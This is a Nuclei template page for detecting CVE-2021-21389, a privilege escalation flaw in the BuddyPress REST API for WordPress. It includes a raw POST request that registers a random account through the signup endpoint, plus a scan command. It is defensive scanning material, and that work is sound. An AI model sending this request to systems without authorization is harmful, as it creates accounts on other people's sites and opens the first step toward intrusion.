Skip to content
Nuclei Templates

BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution

ID: CVE-2021-21389

Severity: high

Author: lotusdll

Tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress

Description

Section titled “Description”

WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2021-21389


info:
  name: BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution
  author: lotusdll
  severity: high
  description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system.
  remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
  reference:
    - https://github.com/HoangKien1020/CVE-2021-21389
    - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
    - https://codex.buddypress.org/releases/version-7-2-1/
    - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-21389
    cwe-id: CWE-863
    epss-score: 0.83143
    epss-percentile: 0.98426
    cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: buddypress
    product: buddypress
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress


http:
  - raw:
      - |
        POST /wp-json/buddypress/v1/signup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8


        {
          "user_login":"{{randstr}}",
          "password":"{{randstr}}",
          "user_name":"{{randstr}}",
          "user_email":"{{randstr}}@interact.sh"
        }


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "user_login"
          - "registered"
          - "activation_key"
          - "user_email"
        condition: and


      - type: word
        part: header
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f28e602478b3ceb1da7215b74174649cf49b9aa6f1e4c8d8f30af1bb087587f6022100ea0b7995eb1a422e2c99cd8744a0fd03375c1927264862596c05312af90f1064:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21389.yaml"

View on Github